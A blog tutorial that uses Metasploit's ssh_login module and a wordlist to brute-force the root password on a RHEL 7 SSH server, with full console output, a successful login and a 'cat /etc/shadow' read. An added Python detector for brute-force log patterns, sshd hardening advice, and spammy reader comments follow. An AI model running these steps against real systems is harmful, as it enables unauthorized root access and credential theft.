In this tutorial, we will brute-force the password for the 'root' user on an SSH server running on RHEL 7, using Metasploit on Kali Linux.
SSH Server Name: meru.mycompany.com
SSH Server IP Address: 192.168.122.1
Perform the following steps on the Kali Linux machine:
1) Start the services.
root@kali:~# service postgresql start
[ ok ] Starting PostgreSQL 9.1 database server: main.
root@kali:~# service metasploit start
[ ok ] Starting Metasploit rpc server: prosvc.
[ ok ] Starting Metasploit web server: thin.
[ ok ] Starting Metasploit worker: worker.
2) Start the Metasploit console.
root@kali:~# msfconsole
msf >
3) Check the database status.
msf > db_status
[*] postgresql connected to msf3
4) Run an nmap scan through Metasploit's database extension (db_nmap). The details the scan finds are added automatically to the Metasploit database.
msf > db_nmap -sS 192.168.122.1 -p 22
[*] Nmap: Starting Nmap 6.47 ( http://nmap.org ) at 2015-06-17 14:01 IST
[*] Nmap: Nmap scan report for meru.mycompany.com (192.168.122.1)
[*] Nmap: Host is up (0.0024s latency).
[*] Nmap: PORT STATE SERVICE
[*] Nmap: 22/tcp open ssh
[*] Nmap: MAC Address: 52:54:00:8A:8D:BA (QEMU Virtual NIC)
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 0.27 seconds
5) Search for module.
msf > search ssh
auxiliary/scanner/ssh/ssh_login normal SSH Login Check Scanner
6) Select the module.
msf > use auxiliary/scanner/ssh/ssh_login
7) View options.
msf auxiliary(ssh_login) > show options
Module options (auxiliary/scanner/ssh/ssh_login):
   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   false            no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false            no        Add all passwords in the current database to the list
   DB_ALL_USERS      false            no        Add all users in the current database to the list
   PASSWORD                           no        A specific password to authenticate with
   PASS_FILE                          no        File containing passwords, one per line
   RHOSTS                             yes       The target address range or CIDR identifier
   RPORT             22               yes       The target port
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           1                yes       The number of concurrent threads
   USERNAME                           no        A specific username to authenticate as
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false            no        Try the username as the password for all users
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           true             yes       Whether to print output for all attempts
8) Set options.
msf auxiliary(ssh_login) > set RHOSTS 192.168.122.1
RHOSTS => 192.168.122.1
msf auxiliary(ssh_login) > set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
PASS_FILE => /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
msf auxiliary(ssh_login) > set USERNAME root
USERNAME => root
9) Execute the module.
msf auxiliary(ssh_login) > run
[*] 192.168.122.1:22 SSH - Starting bruteforce
[-] 192.168.122.1:22 SSH - Failed: 'root:123456'
[-] 192.168.122.1:22 SSH - Failed: 'root:12345'
[-] 192.168.122.1:22 SSH - Failed: 'root:123456789'
[-] 192.168.122.1:22 SSH - Failed: 'root:password'
[-] 192.168.122.1:22 SSH - Failed: 'root:iloveyou'
[+] 192.168.122.1:22 SSH - Success: 'root:adminpasswd' 'uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 Linux meru.mycompany.com 3.10.0-123.el7.x86_64 #1 SMP Mon Jun 30 12:09:22 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux '
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssh_login) > id
[*] exec: id
uid=0(root) gid=0(root) groups=0(root)
msf auxiliary(ssh_login) > cat /etc/shadow
As seen above, we have got a root shell on the victim machine.
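On the server side, each failed guess in step 9 produces a "Failed password" line in /var/log/secure on RHEL 7, and the final hit produces an "Accepted password" line. The detector below is an added example, not part of the original tutorial; the log lines are constructed and the client address 192.168.122.50 is an assumption, since the page does not give the Kali machine's IP.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample in the /var/log/secure format sshd uses on RHEL 7.
# The client addresses are assumptions; the page does not list them.
SAMPLE_LOG = """\
Jun 17 14:02:11 meru sshd[2211]: Failed password for root from 192.168.122.50 port 40022 ssh2
Jun 17 14:02:12 meru sshd[2213]: Failed password for root from 192.168.122.50 port 40024 ssh2
Jun 17 14:02:13 meru sshd[2215]: Failed password for root from 192.168.122.50 port 40026 ssh2
Jun 17 14:02:14 meru sshd[2217]: Failed password for root from 192.168.122.50 port 40028 ssh2
Jun 17 14:02:15 meru sshd[2219]: Failed password for root from 192.168.122.50 port 40030 ssh2
Jun 17 14:02:16 meru sshd[2221]: Accepted password for root from 192.168.122.50 port 40032 ssh2
Jun 17 15:10:40 meru sshd[2390]: Failed password for invalid user bob from 192.168.122.77 port 51000 ssh2
Jun 17 15:30:02 meru sshd[2401]: Accepted password for alice from 192.168.122.77 port 51010 ssh2
"""

LINE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+")

def detect_bruteforce(log_text, threshold=5, window=timedelta(minutes=5), year=2015):
    """Return alerts for sources with >= `threshold` failures inside `window`.

    Each alert is (ip, failure_count, compromised_user_or_None); the last field
    is set when an Accepted login from the same source follows the burst.
    """
    failures = defaultdict(list)   # ip -> timestamps of failures still in window
    alerts = {}
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        # syslog timestamps carry no year, so the caller supplies one
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        ip = m["ip"]
        recent = [t for t in failures[ip] if ts - t <= window]
        if m["result"] == "Failed":
            recent.append(ts)
            if len(recent) >= threshold:
                alerts[ip] = (ip, len(recent), alerts.get(ip, (0, 0, None))[2])
        elif len(recent) >= threshold:
            # a success right after a burst of failures: treat as a guessed password
            alerts[ip] = (ip, len(recent), m["user"])
        failures[ip] = recent
    return sorted(alerts.values())
```

Setting PermitRootLogin no and PasswordAuthentication no in sshd_config removes the password prompt this tutorial depends on, at which point the detector should stay silent for root.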
how to hack ssh root
http://bicombusiness.blogspot.com/2016/01/sshpro13-final.html
Bilal Khan is a thief don't listen to the mother fucker
This still works???
Thzone
it work thanks
Hi,
Nice technique. Thanks for sharing.
Watch now: How To Hack Linux Red Hat Password
Cat/etc/shadow command not working..